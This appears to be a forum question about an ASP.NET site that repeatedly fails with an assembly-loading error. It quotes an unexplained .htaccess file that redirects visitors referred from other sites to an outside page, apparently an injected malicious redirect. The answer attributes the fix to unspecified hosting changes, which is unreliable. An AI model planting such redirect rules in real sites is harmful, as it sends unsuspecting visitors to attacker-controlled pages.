# Weird Issue at my Web SIte

Tags: asp.net

The web site was working fine since 2 months, now it shows error:

```
Server Error in '/' Application.
Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
Parser Error Message: Could not load the assembly 'App_Web_ir1tlux4'. Make sure that it is compiled before accessing the page.
Line 1:  <%@ page title="MIS for Cattle & Buffalo - Home" language="C#" masterpagefile="~/MainMaster.master" autoeventwireup="true" inherits="index, App_Web_ir1tlux4" %>
```

The weird thing is, if I reupload a fresh published version, the web site will
work fine for 1/2 hours then again it will show the above error.

Please help

I have tried with different modifications in web.config file and other
suggestions on forums.asp.net in similar threads but nothing seems to work for me

Also a file .htaccess with the following contents appears only in the FTP I think when this file is added by
hosting company server, then the problem is started:

```
<IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)
    RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/\1$ [NC]
    RewriteRule ^.*$ http://travlor.com/acgu.html [L,R]
</IfModule>
```

Answer (score 0):

I did nothing new, and it is fixed
I think the hosting server's IIS must have change some setting for
My web site folder being added as an application.

So it is resolved without any thing to do